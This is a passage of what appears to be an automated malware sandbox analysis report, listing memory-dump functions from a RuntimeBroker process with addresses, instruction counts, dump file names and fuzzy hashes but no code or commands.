                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6bafc0bb267ad5a5b12680f8dffdbf68e83b105d832a2c2816f65c6ab1f59523
                                                                                                    • Instruction ID: af5894670fa649cc8bb08ce1e8615a84024a5276c4b2e74e9b9f98e519f81048
                                                                                                    • Opcode Fuzzy Hash: 6bafc0bb267ad5a5b12680f8dffdbf68e83b105d832a2c2816f65c6ab1f59523
                                                                                                    • Instruction Fuzzy Hash: BB412775E0875C8FEB54DFA8C899AEDBBF0FB5A310F10416AD009EB256DB34A845CB40
                                                                                                    Function 00007FFD9C1BBD2E Relevance: .1, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fa51981defc0408234bd48207e9bcd0b112d2a6e6ff21c8e569e1048be917142
                                                                                                    • Instruction ID: 65bbba0a53668e1642fd34d461aadaafad0ee09505df799d9dc25afa5e3632cb
                                                                                                    • Opcode Fuzzy Hash: fa51981defc0408234bd48207e9bcd0b112d2a6e6ff21c8e569e1048be917142
                                                                                                    • Instruction Fuzzy Hash: 8E415931E0824A8FEB24DF94C8947ADBBB1FB55355F10027AC009AB6D5CB796886CF44
                                                                                                    Function 00007FFD9BAD0998 Relevance: .1, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ca6535a770e3c009165f9af2a165f59ce30f56bb7ca16e696e23535fb26f0fa9
                                                                                                    • Instruction ID: 3080dc181e9d557486c54a6cbfc5c4c2811b012db1becb91491fc0e285d52097
                                                                                                    • Opcode Fuzzy Hash: ca6535a770e3c009165f9af2a165f59ce30f56bb7ca16e696e23535fb26f0fa9
                                                                                                    • Instruction Fuzzy Hash: E1413B70A1495D8FDF94EF98C895AEDB7F1FF58310F010169E409E32A5CB34A981CB80
                                                                                                    Function 00007FFD9BADA821 Relevance: .1, Instructions: 111COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: edfc8e4afb27f100fee6a009399c91c4d79b1881957ab0c206bc782529b92e5d
                                                                                                    • Instruction ID: 66a226d7319011dfbbc577807dff7ec4465d8444e60e2a6358390512a09fac51
                                                                                                    • Opcode Fuzzy Hash: edfc8e4afb27f100fee6a009399c91c4d79b1881957ab0c206bc782529b92e5d
                                                                                                    • Instruction Fuzzy Hash: 9441FC30A0951D8EDBA4DB14C865EED77B5EF99311F5002EAD00EE72A1CE746A85CF41
                                                                                                    Function 00007FFD9C1B4A3D Relevance: .1, Instructions: 103COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 41d069a51dc52a43caca3a63aa1e705b8e8de4881f618dc149580292a2fe3e41
                                                                                                    • Instruction ID: 5e0e6011d0d91da8e204a4e592fd2e64681f2245fa6fef2962ff2c1c51b6935a
                                                                                                    • Opcode Fuzzy Hash: 41d069a51dc52a43caca3a63aa1e705b8e8de4881f618dc149580292a2fe3e41
                                                                                                    • Instruction Fuzzy Hash: D331C471E0864F8FDB64DFA4C8646EE7BB1EF55340F14417AD00AF72DACA3468448B98
                                                                                                    Function 00007FFD9BAD4A61 Relevance: .1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fb21450b8737124033c7830fb6978a31583074866f198343c7b4bbec6043cb45
                                                                                                    • Instruction ID: 2fa809c59cf663e88dc8078ce99cac63f5ecbc3647b482f5b7e8169c7f6a94d0
                                                                                                    • Opcode Fuzzy Hash: fb21450b8737124033c7830fb6978a31583074866f198343c7b4bbec6043cb45
                                                                                                    • Instruction Fuzzy Hash: A841DC71E4952D8EEBA4DB54C8947ECB7F0EF95300F5042EAD04DA62A1DE782AC1CF01
                                                                                                    Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 07fb815b34a6e205a4e9d854b746d6338e9d2638ceb60b4f5893b8f8130b805c
                                                                                                    • Instruction ID: ad7b9d6ae530018bbe48a5d34bd459b23c967b5d8e160f9e32e23803d69ef858
                                                                                                    • Opcode Fuzzy Hash: 07fb815b34a6e205a4e9d854b746d6338e9d2638ceb60b4f5893b8f8130b805c
                                                                                                    • Instruction Fuzzy Hash: CD212B75B0E28D4FE73297A8CC312ED3B60EF82711F460677C1549A1F2C6782605C795
                                                                                                    Function 00007FFD9BAD1172 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 90295c93d3adbc4ae146486ebe8cbf1a56d31f604b33ef235a436b8cab751047
                                                                                                    • Instruction ID: e7c1a0bdc83450ecd47e0c7ffcea00cbae7ec14ae9c965e92ad5101aa1fb236f
                                                                                                    • Opcode Fuzzy Hash: 90295c93d3adbc4ae146486ebe8cbf1a56d31f604b33ef235a436b8cab751047
                                                                                                    • Instruction Fuzzy Hash: BB21DA30A1591D8FDB94EFA8C8A89EDB7F1FF68304F11066AE40DD72A5DB74A941CB40
                                                                                                    Function 00007FFD9C1B8FCB Relevance: .1, Instructions: 66COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c480f58f9738fa7d4f0e07d1728cc4485ba6981c215613260a4a07970d1eef21
                                                                                                    • Instruction ID: 03993e246991828c405ccd3f2833fd8b3c9775269788def040f0072a9108bc61
                                                                                                    • Opcode Fuzzy Hash: c480f58f9738fa7d4f0e07d1728cc4485ba6981c215613260a4a07970d1eef21
                                                                                                    • Instruction Fuzzy Hash: B711BC35908A4D8FCF90EF64D844AEABBB0FB65314F0001AAE40CC71A1DB35DA95CB80
                                                                                                    Function 00007FFD9C1B9805 Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bb300db6e0f1408a5b4a575d6c17402eec268382485db0d7bdc576a2515a4d2f
                                                                                                    • Instruction ID: dcafc1128504d2f13c27fdc8f9139ea3ba88a868fddacfe9f09b49a9bdedf04a
                                                                                                    • Opcode Fuzzy Hash: bb300db6e0f1408a5b4a575d6c17402eec268382485db0d7bdc576a2515a4d2f
                                                                                                    • Instruction Fuzzy Hash: 8C119E31918A0ECFDF94EF98C898ABABBF0FF14309F0005AAD459D7595CB31A590CB85
                                                                                                    Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8057bef169d04579055e62e005c61f8ac81768673dfbe3d7ab5ddefb7d8a8a40
                                                                                                    • Instruction ID: 9eb1b65494dff80a7bbd6d63029d5a7379afd607d4efccad4eaa987b8e53a7b4
                                                                                                    • Opcode Fuzzy Hash: 8057bef169d04579055e62e005c61f8ac81768673dfbe3d7ab5ddefb7d8a8a40
                                                                                                    • Instruction Fuzzy Hash: 72110631A0E28D8FE7229BA4C8302E97B70EF82711F0546B7D054DB1F2CA782609C755
                                                                                                    Function 00007FFD9C1B9001 Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 94b4803ddde2861bfd66f1334b0d07634582d3cb1091bfa91bb28895e57d0683
                                                                                                    • Instruction ID: d0ac2eeeb9725b62b36e593902657f2ab7637373a803305c4d7bbd14489bb3a8
                                                                                                    • Opcode Fuzzy Hash: 94b4803ddde2861bfd66f1334b0d07634582d3cb1091bfa91bb28895e57d0683
                                                                                                    • Instruction Fuzzy Hash: 8811C23054868D8FCB46DF64C865AE97FB0EF16314F0400D7E448C70A2C6399596CB51
                                                                                                    Function 00007FFD9BAD0B7F Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 3e2477a5948ae63070daa9fd3b373e441ddfa20f73f3aaf81f5d4b68bb728b21
                                                                                                    • Instruction ID: b5af68458b3cb44e247bd72c17dcddc1fb0478ab39eb262f0aa64723753ab1cd
                                                                                                    • Opcode Fuzzy Hash: 3e2477a5948ae63070daa9fd3b373e441ddfa20f73f3aaf81f5d4b68bb728b21
                                                                                                    • Instruction Fuzzy Hash: 8C115A3166924D8FCF44EF6CD8919EAB7A0FF59308F0102AAE84DD3251C730A564CB81
                                                                                                    Function 00007FFD9C1B837C Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1b27e7f6130fa4f4d4bad62c3c2cf70cc75528e7280cae3ca6be3109107bc88b
                                                                                                    • Instruction ID: c901f46c21f449b00caa157518a5d975a1a040929b992a543a483ad13c5d2dca
                                                                                                    • Opcode Fuzzy Hash: 1b27e7f6130fa4f4d4bad62c3c2cf70cc75528e7280cae3ca6be3109107bc88b
                                                                                                    • Instruction Fuzzy Hash: 4E110831E0C54B8FEB54EBD8C4646ECB3B1EF54360F44827AC408E6199D938A4428B44
                                                                                                    Function 00007FFD9BAD4B6F Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction ID: 3e97a83bda5f457f100fcfba8b79c93e8ac96d357fa61eecf91f84aff9641c7f
                                                                                                    • Opcode Fuzzy Hash: e864652300de8a606cf3d5965fc07d723ba137fc0988361cd5264102c2a6e98d
                                                                                                    • Instruction Fuzzy Hash: CD21A770D4966D8ADBB4DB54C8A83ECB6B1EB94301F4142E9D00DA62A1CFB86AC4DF00
                                                                                                    Function 00007FFD9C1BB571 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9a710983b3251b1e9b5e2b1e4bb48cd80a4c6d233896d95fe09ae111b2136321
                                                                                                    • Instruction ID: c4b6f483d9a56360ba585f554e0bb343e5f9e6dd259f6c46045e599e4d1f3713
                                                                                                    • Opcode Fuzzy Hash: 9a710983b3251b1e9b5e2b1e4bb48cd80a4c6d233896d95fe09ae111b2136321
                                                                                                    • Instruction Fuzzy Hash: AF114671A1961E9FDBA4EF84D4A4BA8B3F2FB49340F5010B9D40AE2685CB34A9C48F04
                                                                                                    Function 00007FFD9C1BBD6F Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 835f1e46cabd0131ab46cd64bc8470bf5833473569a11bd80ce121e9076e542a
                                                                                                    • Instruction ID: 9e83de2cbf1fc80e2ed1f44d9bbdb5d83be606b73c4c0254e303d6c1c3a0829d
                                                                                                    • Opcode Fuzzy Hash: 835f1e46cabd0131ab46cd64bc8470bf5833473569a11bd80ce121e9076e542a
                                                                                                    • Instruction Fuzzy Hash: F1113431E0471D8FDB64EF94C894BEDB3B2FB94300F20426AC009AB295CB356886CF44
                                                                                                    Function 00007FFD9C1B4F89 Relevance: .0, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 66492d86c6a7c246513af2d502f2c51df2823e8c9b13d72527c23322dbe1ed6f
                                                                                                    • Instruction ID: 90b6ae58f1813f51d3eb8bd3cb6102a509f461e55ca97ad830940d29e582bca8
                                                                                                    • Opcode Fuzzy Hash: 66492d86c6a7c246513af2d502f2c51df2823e8c9b13d72527c23322dbe1ed6f
                                                                                                    • Instruction Fuzzy Hash: 6D113930918A4D8FCF85EF68C859AAA7BF0FF28304F0145AAE419D72A2D734E554CB80
                                                                                                    Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f0323de3d364dbc657b1fd4fb3d630281dc6add6a5f9b763559a73875286dc25
                                                                                                    • Instruction ID: 3b930f856f0506c608259d4cfc3958b711b85d14ee7f6bab2ee0c72481cf9c9a
                                                                                                    • Opcode Fuzzy Hash: f0323de3d364dbc657b1fd4fb3d630281dc6add6a5f9b763559a73875286dc25
                                                                                                    • Instruction Fuzzy Hash: A001D270A0E28E8FE722ABA4C8702E97B70EF82710F0546B7D054DB1E2CA782604C745
                                                                                                    Function 00007FFD9C1BA5B9 Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1ff202724eff3b50d74b2a270a3148f94fd89a474aa831d75391f5480891414c
                                                                                                    • Instruction ID: 906753826a7146bf290988ab6c70b5a41d1d33bee812c0086712a46da0a24038
                                                                                                    • Opcode Fuzzy Hash: 1ff202724eff3b50d74b2a270a3148f94fd89a474aa831d75391f5480891414c
                                                                                                    • Instruction Fuzzy Hash: 7B012970918A8D8FCF85EF68C858AAA7BF0FF28300F0405AAD419D72A1DB34D590CB80
                                                                                                    Function 00007FFD9C1BBB09 Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fd6c6596eb8707835bb2284c5d8245f3386e11fe36a7b4f4f3283aa7cafe2b03
                                                                                                    • Instruction ID: 5914774282d9735eb06adb031205e02013bde9df4fbd7310cc478fea2c4f6b63
                                                                                                    • Opcode Fuzzy Hash: fd6c6596eb8707835bb2284c5d8245f3386e11fe36a7b4f4f3283aa7cafe2b03
                                                                                                    • Instruction Fuzzy Hash: F2018C30908A8D8FDF85EF68C859AAE7FF0FF28300F0401AAD408D71A1DB349994CB80
                                                                                                    Function 00007FFD9C1BAA59 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4148d61bfc82d2e03236cdd48da69af25c42074b8d009b60383aae0b7a824f4a
                                                                                                    • Instruction ID: f908cbaaf4b7203595714a7200e64c05e87bece3adf8397f88aed11bda98001b
                                                                                                    • Opcode Fuzzy Hash: 4148d61bfc82d2e03236cdd48da69af25c42074b8d009b60383aae0b7a824f4a
                                                                                                    • Instruction Fuzzy Hash: 6A015E7190868D8FDF85EF68C898AAD7FB0FF25300F0501AAD418D72A2DB349954CB41
                                                                                                    Function 00007FFD9C1B95E0 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b9c48e853da1115ad63ed07bc64f00c550bb8ff2b1be7ab3d4ecf717be013fd1
                                                                                                    • Instruction ID: 006bdb0dbd1c00c8ecc3c737a7a6fb96bf9abbeab1e04b05a896b740fbc43788
                                                                                                    • Opcode Fuzzy Hash: b9c48e853da1115ad63ed07bc64f00c550bb8ff2b1be7ab3d4ecf717be013fd1
                                                                                                    • Instruction Fuzzy Hash: D201B67091490E9FDF84EF58C858AAEBBF0FB68305F10456AA41DD32A4DB31A690CB80
                                                                                                    Function 00007FFD9C1B9800 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4652ce055905bc756ef2a3244bafcace240977a621d37053f6fd7b77100133db
                                                                                                    • Instruction ID: 637095db84594532e2012b9e5e3097707da8f30a2b614cea249ebf09855c48b3
                                                                                                    • Opcode Fuzzy Hash: 4652ce055905bc756ef2a3244bafcace240977a621d37053f6fd7b77100133db
                                                                                                    • Instruction Fuzzy Hash: 6A01A47091490E8FDF94EF58C859AAEBBF0FB68305F10456AA819D36A4DB30A590CB80
                                                                                                    Function 00007FFD9C1B5D75 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: eb701aa4eb9e56fc7f83fc58f7ef254023b73625b2bcacf5d20f6f2e5aa6ef0a
                                                                                                    • Instruction ID: 17fce3555cd4f7349e2f9b6774184515e77a3e853b0c80c69e76b450c501f228
                                                                                                    • Opcode Fuzzy Hash: eb701aa4eb9e56fc7f83fc58f7ef254023b73625b2bcacf5d20f6f2e5aa6ef0a
                                                                                                    • Instruction Fuzzy Hash: 7FF0FF31A9864E9BD720EFA8EC645E9B7B0FF14308F0045BBE48DD60C6EA30A194CB45
                                                                                                    Function 00007FFD9C1B16D8 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 77dece93af95ed1b435d8109118871cdb3b00152ead1eb2e4b4467bc1f2ff48e
                                                                                                    • Instruction ID: 55ac419de8d47adfb7f4f842d312b2f1dacd37a1f9ae3ded07e1a0dbc6db61db
                                                                                                    • Opcode Fuzzy Hash: 77dece93af95ed1b435d8109118871cdb3b00152ead1eb2e4b4467bc1f2ff48e
                                                                                                    • Instruction Fuzzy Hash: 75F0F930A1490D9FDF94EF58C498AAA7BB0FF68305F1040AAA40DD31A4CB31A590CB80
                                                                                                    Function 00007FFD9BAD06A5 Relevance: .0, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1f0e8c931d7e13c84949c39ef03ae361fa6965a6a2618e5734573dcd24fe800e
                                                                                                    • Instruction ID: 352625aa54612fc349b0161d8f03f3cc81c8a12c85e5a09f1e6ce180a24f3a81
                                                                                                    • Opcode Fuzzy Hash: 1f0e8c931d7e13c84949c39ef03ae361fa6965a6a2618e5734573dcd24fe800e
                                                                                                    • Instruction Fuzzy Hash: 02F03030A05A5E9FEB60EF58D4596FD77A0FFA4304F514536E41CC21A0DAB46290CB84
                                                                                                    Function 00007FFD9C1B14C8 Relevance: .0, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c55ddf5f1c69660dd2b6cdd8a6a8dc027dc769f182b5b8f8b4874ed53ec77580
                                                                                                    • Instruction ID: 1ebf36940503c25b33ac04279c0eb6d68b7f958d0c30d709de1983823577ad96
                                                                                                    • Opcode Fuzzy Hash: c55ddf5f1c69660dd2b6cdd8a6a8dc027dc769f182b5b8f8b4874ed53ec77580
                                                                                                    • Instruction Fuzzy Hash: C1F01D30914A4D8FDB90EF68C849AEA7BF0FF18305F504666E81CD3254DB34E1A0CB81
                                                                                                    Function 00007FFD9C1BBCD2 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
